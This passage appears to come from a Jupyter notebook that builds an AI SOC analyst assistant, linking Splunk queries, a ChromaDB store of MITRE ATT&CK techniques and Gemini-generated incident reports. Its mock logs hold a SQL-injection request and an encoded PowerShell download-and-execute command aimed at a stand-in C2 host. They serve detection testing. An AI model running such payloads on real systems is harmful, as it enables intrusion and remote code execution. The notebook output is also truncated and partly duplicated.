            print(f"Splunk search job {job.sid} did not complete successfully. Final status: {job.content.get('dispatchState')}")
            if job.messages: # Print any error/warning messages
                print(f"Job {job.sid} messages: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []
    
# --- Embedding & ChromaDB Functions ---
def get_embedding(text):
    """Generates an embedding for the given text using the specified Gemini embedding model."""
    try:
        # Use RETRIEVAL_DOCUMENT for texts meant to be retrieved (like knowledge base entries)
        response = genai.embed_content(model=embedding_model, content=text, task_type="RETRIEVAL_DOCUMENT")
        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding for text (first 50 chars): '{text[:50]}...': {e}")
        return None

def load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH):
    """Loads MITRE ATT&CK techniques from a STIX 2.x JSON file."""
    print(f"Loading MITRE ATT&CK data from {stix_json_path} using stix2...")
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)
        
        attack_data_points = []
        # Query for all Attack Pattern objects
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))

        for tech in techniques:
            # Extract MITRE ID (e.g., T1000) from external_references
            mitre_id = None
            for ext_ref in tech.external_references:
                if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                    if ext_ref['external_id'].startswith('T'):
                        mitre_id = ext_ref['external_id']
                        break
            if not mitre_id:
                # print(f"Warning: Skipping technique with no valid MITRE ID: {tech.name}")
                continue # Skip techniques without a T-number ID

            description = tech.description if hasattr(tech, 'description') else "No description available."
            
            # Extract Tactics using x_mitre_tactic_refs (STIX2 standard way)
            tactics_names = []
            if hasattr(tech, 'x_mitre_tactic_refs'):
                for tactic_ref_id in tech.x_mitre_tactic_refs:
                    tactic_sdo = stix_store.get(tactic_ref_id)
                    if tactic_sdo and tactic_sdo.type == 'tactic':
                        tactics_names.append(tactic_sdo.name)
            tactics_str = ', '.join(tactics_names) if tactics_names else 'N/A'
            
            # Construct full text for embedding
            full_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {tactics_str}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )
            
            attack_data_points.append({
                "id": mitre_id,
                "text": full_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_str,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        return attack_data_points
    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/ and place it in the script's directory.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge data points, avoiding duplicates."""
    print(f"Attempting to add {len(data_points)} documents to the knowledge base.")
    
    # Get existing IDs to prevent adding duplicates
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result.get('ids', []))

    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            # Generate a unique ID if not provided (e.g., for custom knowledge)
            unique_id = f"custom_knowledge_{hash(dp['text'])}"

        if unique_id in existing_ids:
            # print(f"Skipping existing document with ID: {unique_id}") # Uncomment for verbose debugging
            continue

        embedding = get_embedding(dp["text"])
        if embedding is not None: # Ensure embedding was successfully generated
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Skipping document due to embedding failure: {dp['text'][:50]}...")

    if docs_to_add:
        try:
            security_collection.add(
                documents=docs_to_add,
                embeddings=embeddings_to_add,
                metadatas=metadatas_to_add,
                ids=ids_to_add
            )
            print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
        except Exception as e:
            print(f"Error adding documents to ChromaDB: {e}")
    else:
        print("No new unique documents to add to the vector store.")

def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    """
    Searches the ChromaDB knowledge base for relevant documents.
    Args:
        query_text (str): The text to search for.
        n_results (int): Number of results to return.
        filter_metadata (dict, optional): A dictionary to filter results by metadata.
                                          E.g., {"type": "mitre_attack_technique"}.
    Returns:
        dict: ChromaDB query results (documents, distances, metadatas).
    """
    query_embedding = get_embedding(query_text)
    if query_embedding is not None:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata # Apply metadata filtering if provided
        )
        return results
    return None

# --- AI Report Generation Function ---
def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    """
    Generates a comprehensive security incident report using Gemini.
    """
    # Format MITRE details for the prompt
    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name', 'N/A')} ({mapping.get('technique_id', 'N/A')})\n"
            if mapping.get('tactics') and mapping['tactics'] != 'N/A':
                mitre_details_str += f"  **Tactics:** {mapping['tactics']}\n"
            # Ensure description is a string and handle potential truncation
            description_text = str(mapping.get('description', 'No description.')).strip()
            mitre_details_str += f"  **Description:** {description_text[:200]}...\n"
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score', 0.0):.4f}\n"

    # Main prompt for Gemini
    prompt = f"""
You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, relevant security knowledge, and potential MITRE ATT&CK mappings.

---
**Splunk Logs (Raw Data for Context):**
{splunk_logs}

---
**Relevant Security Knowledge (from Vector Store - e.g., playbooks, past incidents):**
{relevant_knowledge if relevant_knowledge else "No specific relevant security knowledge found."}

---
**Potential MITRE ATT&CK Mappings (Most Relevant First):**
{mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

---
**Incident Summary (if provided by human analyst):**
{incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

---
**Instructions for Report Generation:**
1.  **Incident Title:** Create a clear and descriptive title for the incident.
2.  **Date/Time of Detection:** Extract the earliest and latest timestamps from the logs. Provide a range if multiple times.
3.  **Affected Systems/Users:** Identify specific hosts, IP addresses, or users mentioned in the logs.
4.  **Description of Incident:** Summarize the observed events chronologically. **Crucially, explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques, referencing their IDs and names from the provided mappings.**
5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified (e.g., "T1078 - Valid Accounts, T1110 - Brute Force").
6.  **Impact:** Briefly describe the potential impact of this incident (e.g., data breach, service disruption, account compromise, unauthorized access).
7.  **Recommended Actions/Remediation:** Based on relevant knowledge (playbooks) and log analysis, suggest immediate and long-term actions for containment, eradication, and recovery.
8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
9.  **Analyst Notes:** Any other observations, open questions, or next steps for further investigation.

Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
"""
    try:
        response = llm.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    """
    Orchestrates the AI SOC Analyst workflow: Splunk query, knowledge retrieval, and report generation.
    """
    print(f"--- Starting AI SOC Analyst Assistant for query ---")
    print(f"DEBUG: Splunk query string:\n```\n{splunk_query}\n```")

    # 1. Connect to Splunk
    splunk_service = connect_to_splunk()
    if not splunk_service:
        print("Failed to connect to Splunk. Cannot proceed.")
        return "Failed to connect to Splunk. Cannot proceed."

    # 2. Retrieve logs from Splunk
    print("Retrieving data from Splunk...")
    raw_splunk_events = run_splunk_query(splunk_service, splunk_query, earliest_time="-24h", latest_time="now")
    
    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")
        splunk_service.logout()
        return "No relevant Splunk logs found to generate a report."
    
    # Format Splunk logs for the LLM
    formatted_splunk_logs = "\n".join([str(event) for event in raw_splunk_events])
    
    # 3. Search vector store for relevant general security knowledge (e.g., playbooks)
    print("Searching vector store for relevant general security knowledge...")
    general_knowledge_query = f"Based on these security logs, what are relevant security playbooks, past incidents, or policies? Logs: {formatted_splunk_logs}"
    general_knowledge_results = search_security_knowledge_base(
        general_knowledge_query,
        n_results=3, # Get top 3 general knowledge results
        filter_metadata={"type": {"$ne": "mitre_attack_technique"}} # Exclude MITRE techniques here
    )
    relevant_knowledge_str = ""
    if general_knowledge_results and general_knowledge_results['documents'] and general_knowledge_results['documents'][0]:
        print("Found relevant general knowledge:")
        for i, doc in enumerate(general_knowledge_results['documents'][0]):
            relevant_knowledge_str += f"* **Source:** {general_knowledge_results['metadatas'][0][i].get('type', 'N/A')} ({general_knowledge_results['metadatas'][0][i].get('incident_type', '')})\n"
            relevant_knowledge_str += f"    **Content:** {doc}\n\n"
    else:
        print("No specific relevant general knowledge found in vector store.")

    # 4. Search vector store for potential MITRE ATT&CK mappings
    print("Searching vector store for potential MITRE ATT&CK mappings...")
    mitre_mapping_query = f"Analyze the following security events and identify potential MITRE ATT&CK tactics and techniques: {formatted_splunk_logs}"
    mitre_mapping_results = search_security_knowledge_base(
        mitre_mapping_query,
        n_results=10, # Get top 10 potential MITRE techniques
        filter_metadata={"type": "mitre_attack_technique"} # Only include MITRE techniques
    )
    
    identified_mitre_mappings = []
    if mitre_mapping_results and mitre_mapping_results['documents'] and mitre_mapping_results['documents'][0]:
        print("Found potential MITRE ATT&CK mappings:")
        for i, doc_content in enumerate(mitre_mapping_results['documents'][0]):
            metadata = mitre_mapping_results['metadatas'][0][i]
            distance = mitre_mapping_results['distances'][0][i]
            
            # Only consider mappings within a certain similarity threshold
            if distance < distance_threshold: # A lower distance means higher similarity
                identified_mitre_mappings.append({
                    "technique_name": metadata.get('technique_name'),
                    "technique_id": metadata.get('technique_id'),
                    "tactics": metadata.get('tactics'),
                    "description": doc_content,
                    "distance_score": distance
                })
        
        # Sort by distance score (lower is better/more relevant) and take top 5
        identified_mitre_mappings.sort(key=lambda x: x['distance_score'])
        identified_mitre_mappings = identified_mitre_mappings[:5] # Limit to top 5 for report
        
        for mapping in identified_mitre_mappings:
            print(f"  - {mapping['technique_id']}: {mapping['technique_name']} (Score: {mapping['distance_score']:.4f})")
    else:
        print("No relevant MITRE ATT&CK techniques found within the threshold.")

    # 5. Generate Incident Report using LLM
    print("Generating incident report with Gemini...")
    incident_report = generate_incident_report(
        formatted_splunk_logs,
        relevant_knowledge_str,
        identified_mitre_mappings,
        incident_summary
    )
    
    # 6. Log out from Splunk
    try:
        splunk_service.logout()
        print("\nLogged out from Splunk.")
    except Exception as e:
        print(f"Error during Splunk logout: {e}")

    print("\n--- AI SOC Analyst Assistant Completed ---")
    return incident_report

# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting AI SOC Analyst Assistant (Full Architecture) ---")

    # --- Step 0: Ensure Security Knowledge Base is Populated ---
    print("\n--- Checking/Populating Security Knowledge Base ---")
    total_docs_in_db = security_collection.count()
    
    needs_mitre_population = False
    if total_docs_in_db == 0:
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. MITRE ATT&CK data and sample knowledge need to be populated.")
    else:
        try:
            # Check if MITRE ATT&CK techniques are present
            mitre_techniques_in_db = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])
            if len(mitre_techniques_in_db['ids']) == 0:
                needs_mitre_population = True
                print("MITRE ATT&CK data not present in knowledge base. Populating now...")
            else:
                print(f"MITRE ATT&CK data already present in knowledge base ({len(mitre_techniques_in_db['ids'])} techniques found).")
        except Exception as e:
            print(f"Warning: Error checking for existing MITRE data: {e}. Assuming MITRE data needs population.")
            needs_mitre_population = True

    if needs_mitre_population:
        mitre_data_points = load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH)
        if mitre_data_points:
            populate_security_knowledge_base(mitre_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. AI mapping might be less effective.")
    
    # Add sample general security knowledge (playbooks, past incidents) if not already present
    sample_data_ids = ["playbook_phishing_response", "playbook_malware_containment", "inc_003_unauth_db_access"]
    sample_data_present = False
    try:
        # Check if at least one of the sample data IDs exists
        if security_collection.get(ids=[sample_data_ids[0]], include=[])['ids']:
            sample_data_present = True
    except Exception as e:
        print(f"Warning: Error checking for sample data: {e}. Will attempt to add.")
        sample_data_present = False

    if not sample_data_present:
        print("Sample security knowledge not fully present. Populating now...")
        sample_security_knowledge = [
            {"id": "playbook_phishing_response", "text": "Playbook: Phishing Incident Response. Trigger: User reports suspicious email or email gateway alert. Steps: 1. Verify email authenticity (headers, sender reputation). 2. Check for malicious attachments/links (sandbox). 3. If malicious, remove email from all affected inboxes. 4. Reset user password if credentials compromised. 5. Educate user. 6. Block malicious sender/domains at firewall/proxy. 7. Log and document. Severity: Medium to High depending on compromise.", "metadata": {"type": "playbook", "incident_type": "phishing"}},
            {"id": "playbook_malware_containment", "text": "Playbook: Malware Containment and Eradication. Trigger: EDR alert, antivirus detection, or user report of suspicious activity. Steps: 1. Isolate infected host(s) from network immediately. 2. Collect forensic data (memory dump, process list). 3. Run full endpoint scan. 4. Identify persistence mechanisms (registry, scheduled tasks, services). 5. Remove malware and persistence. 6. Restore affected files from clean backup. 7. Update security definitions. Severity: High.", "metadata": {"type": "playbook", "incident_type": "malware"}},
            {"id": "inc_003_unauth_db_access", "text": "Past Incident: Incident ID INC-2024-003. Type: Unauthorized Access - Database. Date: 2024-05-10. Affected: Customer Database (MySQL). Attack Vector: Brute force via SSH followed by database privilege escalation. Description: Numerous failed SSH logins from external IP, then successful login to 'admin' account, followed by `SELECT * FROM users;` queries. Containment: Blocked source IP at firewall, disabled compromised admin account, rotated DB credentials. Impact: Potential exfiltration of customer PII. Lessons Learned: Implement MFA for all admin accounts, stronger password policies. MITRE ATT&CK T1078 (Valid Accounts), T1110 (Brute Force).", "metadata": {"type": "past_incident", "incident_type": "unauthorized_access", "mitre_id": "T1078, T1110"}},
        ]
        populate_security_knowledge_base(sample_security_knowledge)
    else:
        print("Sample security knowledge appears to be present. Skipping population.")

    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run a combined simulated scenario ---
    # This Splunk query generates mock logs that hint at various security events.
    splunk_simulated_logs = """| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw = case(
    rn=1, "May 24 09:30:00 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=2, "May 24 09:30:05 webserver-01 sshd[12345]: Failed password for invalid user root from 192.168.1.10 port 54321 ssh2",
    rn=3, "May 24 09:30:10 webserver-01 sshd[12345]: Failed password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=4, "May 24 09:30:15 webserver-01 sshd[12345]: Accepted password for user admin from 192.168.1.10 port 54322 ssh2",
    rn=5, "192.168.1.10 - - [24/May/2025:09:30:20 +0000] \\"GET /admin.php?id=1' UNION SELECT 1,2,3-- HTTP/1.1\\" 404 200 \\"-\\" \\"Mozilla/5.0\\"",
    rn=6, "powershell.exe -NoP -NonI -Exec Bypass -EncodedCommand SQBFAFgAKAAoAE4AZwBvAE0ALgBJAEUAdwAgACgAIgBoAHQAdABwAHM6Ly9jMi5mYWtlZG9vbWFpbi9wYWF5bG9hZC5wc2AwIgApKQAKAA=="
  )
| table _time, host, source, _raw
| sort _time"""

    print("\n\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")
    incident_report = ai_soc_analyst_assistant(
        splunk_simulated_logs,
        incident_summary="Simulated multiple failed SSH login attempts, a successful login, an attempted SQL Injection, and an encoded PowerShell command on an endpoint."
    )
    print("\n--- Final Incident Report ---")
    print(incident_report)

--- Starting AI SOC Analyst Assistant (Full Architecture) ---

--- Checking/Populating Security Knowledge Base ---
MITRE ATT&CK data already present in knowledge base (823 techniques found).
Sample security knowledge appears to be present. Skipping population.

Total unique documents in knowledge base: 826


=== Running Combined Simulated Scenario (with MITRE Mapping) ===
--- Starting AI SOC Analyst Assistant for query ---
DEBUG: Splunk query string:
```
| makeresults count=6
| streamstats count as rn
| eval _time = case(
    rn=1, relative_time(now(), "-30s"),
    rn=2, relative_time(now(), "-25s"),
    rn=3, relative_time(now(), "-20s"),
    rn=4, relative_time(now(), "-15s"),
    rn=5, relative_time(now(), "-10s"),
    rn=6, relative_time(now(), "-5s")
  )
| eval host = case(
    rn <= 5, "webserver-01",
    rn=6, "endpoint-05"
  )
| eval source = case(
    rn <= 4, "/var/log/auth.log",
    rn=5, "/var/log/apache2/access.log",
    rn=6, "PowerShell Operational Log"
  )
| eval _raw =

  reader = results.ResultsReader(job.results())


Successfully retrieved 6 events from Splunk for Job ID 1748151489.77.
Searching vector store for relevant general security knowledge...
Found relevant general knowledge:
Searching vector store for potential MITRE ATT&CK mappings...
Found potential MITRE ATT&CK mappings:
Generating incident report with Gemini...

Logged out from Splunk.

--- AI SOC Analyst Assistant Completed ---

--- Final Incident Report ---
## Incident Report: Potential Brute Force SSH Login and SQL Injection Attempt Followed by Suspicious PowerShell Execution

**Date/Time of Detection:** 2025-05-25T08:37:39.000+03:00 - 2025-05-25T08:38:04.000+03:00

**Affected Systems/Users:**

*   Host: webserver-01, endpoint-05
*   User: root, admin
*   IP Address: 192.168.1.10

**Description of Incident:**

The incident began with multiple failed SSH login attempts targeting the 'root' account on webserver-01 from IP address 192.168.1.10. Subsequently, there was another failed attempt to login as 'admin', followed by a successful

In [2]:
import os
import time # Added for time.sleep
import json # Added for JSON handling if needed, though not directly used in the current version of the STIX loading
from dotenv import load_dotenv

# Splunk SDK imports
import splunklib.client as client
import splunklib.results as results

# ChromaDB import
import chromadb

# Google Gemini imports
import google.generativeai as genai

# STIX2 imports for MITRE ATT&CK parsing
from stix2 import MemoryStore, Filter, AttackPattern, Relationship

# Load environment variables from app.env file
load_dotenv("app.env")

# --- Configuration ---
SPLUNK_HOST = os.environ.get("SPLUNK_HOST", "127.0.0.1")
SPLUNK_PORT = int(os.environ.get("SPLUNK_PORT", 8089))
SPLUNK_USERNAME = os.environ.get("SPLUNK_USERNAME", "admin")
SPLUNK_PASSWORD = os.environ.get("SPLUNK_PASSWORD", "changeme") # IMPORTANT: Update this in app.env
SPLUNK_TOKEN = os.environ.get("SPLUNK_TOKEN") # Optional, not used in current connect_to_splunk

GEMINI_API_KEY = os.environ.get("GEMINI_API_KEY")
if not GEMINI_API_KEY:
    raise ValueError("GEMINI_API_KEY environment variable not set. Get your key from Google AI Studio (https://makersuite.google.com/).")

# Configure Google Gemini
genai.configure(api_key=GEMINI_API_KEY)
llm = genai.GenerativeModel('gemini-pro') # For text generation
embedding_model = 'embedding-001' # For embeddings

# ChromaDB Settings
CHROMA_DB_PATH = "./chroma_db"
chroma_client = chromadb.PersistentClient(path=CHROMA_DB_PATH)
SECURITY_COLLECTION_NAME = "security_knowledge"
security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME)

# MITRE ATT&CK Data File Path
MITRE_STIX_JSON_PATH = "enterprise-attack.json" # Ensure this file is in the same directory as this script

# --- Splunk Connection & Query Functions ---
def connect_to_splunk():
    """Connects to Splunk and returns a Service object."""
    connection_url = f"https://{SPLUNK_HOST}:{SPLUNK_PORT}"
    print(f"Attempting to connect to Splunk at {connection_url}...")
    try:
        service = client.connect(
            host=SPLUNK_HOST,
            port=SPLUNK_PORT,
            username=SPLUNK_USERNAME,
            password=SPLUNK_PASSWORD,
            scheme="https", # Changed from http - Crucial for 8089
            verify=False # IMPORTANT: For testing with self-signed certs. Use True with a proper CA bundle in production!
        )
        print("Successfully connected to Splunk.")
        return service
    except Exception as e:
        print(f"Error connecting to Splunk: {e}")
        return None

def run_splunk_query(service, query, earliest_time="-1h", latest_time="now", output_mode="json"):
    """
    Runs a Splunk search query and returns the results.
    """
    print(f"Attempting to run Splunk query:\n```\n{query}\n```")
    try:
        kwargs = {
            "earliest_time": earliest_time,
            "latest_time": latest_time,
            "output_mode": output_mode,
            "app": "search"
        }
        job = service.jobs.create(query, **kwargs)

        print(f"Splunk Job ID: {job.sid}")
        # Wait for the job to complete
        while not job.is_ready():
            time.sleep(0.1)
            # Print the current dispatch state of the job for more detailed debugging
            print(f"Job {job.sid} status: {job.content.get('dispatchState')}") 

        # After job is ready, check if it's done or if there are messages
        if job.is_done():
            print(f"Splunk search job {job.sid} is DONE. Final dispatch state: {job.content.get('dispatchState')}")
            if job.messages: # Check for messages even if done (warnings, etc.)
                print(f"Job {job.sid} messages: {job.messages}")

            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job to free resources on Splunk
            print(f"Successfully retrieved {len(events)} events from Splunk for Job ID {job.sid}.")
            return events
        else: # This block handles cases where the job might not complete successfully
            print(f"Splunk search job {job.sid} did not complete successfully. Final status: {job.content.get('dispatchState')}")
            if job.messages: # Print any error/warning messages
                print(f"Job {job.sid} messages: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []
    
# --- Embedding & ChromaDB Functions ---
def get_embedding(text):
    """Generates an embedding for the given text using the specified Gemini embedding model."""
    try:
        # Use RETRIEVAL_DOCUMENT for texts meant to be retrieved (like knowledge base entries)
        response = genai.embed_content(model=embedding_model, content=text, task_type="RETRIEVAL_DOCUMENT")
        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding for text (first 50 chars): '{text[:50]}...': {e}")
        return None

def load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH):
    """Loads MITRE ATT&CK techniques from a STIX 2.x JSON file."""
    print(f"Loading MITRE ATT&CK data from {stix_json_path} using stix2...")
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)
        
        attack_data_points = []
        # Query for all Attack Pattern objects
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))

        for tech in techniques:
            # Extract MITRE ID (e.g., T1000) from external_references
            mitre_id = None
            for ext_ref in tech.external_references:
                if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                    if ext_ref['external_id'].startswith('T'):
                        mitre_id = ext_ref['external_id']
                        break
            if not mitre_id:
                # print(f"Warning: Skipping technique with no valid MITRE ID: {tech.name}")
                continue # Skip techniques without a T-number ID

            description = tech.description if hasattr(tech, 'description') else "No description available."
            
            # Extract Tactics using x_mitre_tactic_refs (STIX2 standard way)
            tactics_names = []
            if hasattr(tech, 'x_mitre_tactic_refs'):
                for tactic_ref_id in tech.x_mitre_tactic_refs:
                    tactic_sdo = stix_store.get(tactic_ref_id)
                    if tactic_sdo and tactic_sdo.type == 'tactic':
                        tactics_names.append(tactic_sdo.name)
            tactics_str = ', '.join(tactics_names) if tactics_names else 'N/A'
            
            # Construct full text for embedding
            full_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {tactics_str}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )
            
            attack_data_points.append({
                "id": mitre_id,
                "text": full_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_str,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })
        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        return attack_data_points
    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/ and place it in the script's directory.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge data points, avoiding duplicates."""
    print(f"Attempting to add {len(data_points)} documents to the knowledge base.")
    
    # Get existing IDs to prevent adding duplicates
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result.get('ids', []))

    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            # Generate a unique ID if not provided (e.g., for custom knowledge)
            unique_id = f"custom_knowledge_{hash(dp['text'])}"

        if unique_id in existing_ids:
            # print(f"Skipping existing document with ID: {unique_id}") # Uncomment for verbose debugging
            continue

        embedding = get_embedding(dp["text"])
        if embedding is not None: # Ensure embedding was successfully generated
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Skipping document due to embedding failure: {dp['text'][:50]}...")

    if docs_to_add:
        try:
            security_collection.add(
                documents=docs_to_add,
                embeddings=embeddings_to_add,
                metadatas=metadatas_to_add,
                ids=ids_to_add
            )
            print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
        except Exception as e:
            print(f"Error adding documents to ChromaDB: {e}")
    else:
        print("No new unique documents to add to the vector store.")

def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    """
    Searches the ChromaDB knowledge base for relevant documents.
    Args:
        query_text (str): The text to search for.
        n_results (int): Number of results to return.
        filter_metadata (dict, optional): A dictionary to filter results by metadata.
                                          E.g., {"type": "mitre_attack_technique"}.
    Returns:
        dict: ChromaDB query results (documents, distances, metadatas).
    """
    query_embedding = get_embedding(query_text)
    if query_embedding is not None:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata # Apply metadata filtering if provided
        )
        return results
    return None

# --- AI Report Generation Function ---
def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    """
    Generates a comprehensive security incident report using Gemini.
    """
    # Format MITRE details for the prompt
    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name', 'N/A')} ({mapping.get('technique_id', 'N/A')})\n"
            if mapping.get('tactics') and mapping['tactics'] != 'N/A':
                mitre_details_str += f"  **Tactics:** {mapping['tactics']}\n"
            # Ensure description is a string and handle potential truncation
            description_text = str(mapping.get('description', 'No description.')).strip()
            mitre_details_str += f"  **Description:** {description_text[:200]}...\n"
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score', 0.0):.4f}\n"

    # Main prompt for Gemini
    prompt = f"""
You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, relevant security knowledge, and potential MITRE ATT&CK mappings.

---
**Splunk Logs (Raw Data for Context):**
{splunk_logs}

---
**Relevant Security Knowledge (from Vector Store - e.g., playbooks, past incidents):**
{relevant_knowledge if relevant_knowledge else "No specific relevant security knowledge found."}

---
**Potential MITRE ATT&CK Mappings (Most Relevant First):**
{mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

---
**Incident Summary (if provided by human analyst):**
{incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

---
**Instructions for Report Generation:**
1.  **Incident Title:** Create a clear and descriptive title for the incident.
2.  **Date/Time of Detection:** Extract the earliest and latest timestamps from the logs. Provide a range if multiple times.
3.  **Affected Systems/Users:** Identify specific hosts, IP addresses, or users mentioned in the logs.
4.  **Description of Incident:** Summarize the observed events chronologically. **Crucially, explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques, referencing their IDs and names from the provided mappings.**
5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified (e.g., "T1078 - Valid Accounts, T1110 - Brute Force").
6.  **Impact:** Briefly describe the potential impact of this incident (e.g., data breach, service disruption, account compromise, unauthorized access).
7.  **Recommended Actions/Remediation:** Based on relevant knowledge (playbooks) and log analysis, suggest immediate and long-term actions for containment, eradication, and recovery.
8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
9.  **Analyst Notes:** Any other observations, open questions, or next steps for further investigation.

Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
"""
    try:
        response = llm.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    print(f"--- Starting AI SOC Analyst Assistant for query ---")
    print(f"DEBUG: Splunk query string:\n```\n{splunk_query}\n```")

    splunk_service = connect_to_splunk()

    # --- ADD THESE DIAGNOSTIC PRINTS ---
    if splunk_service:
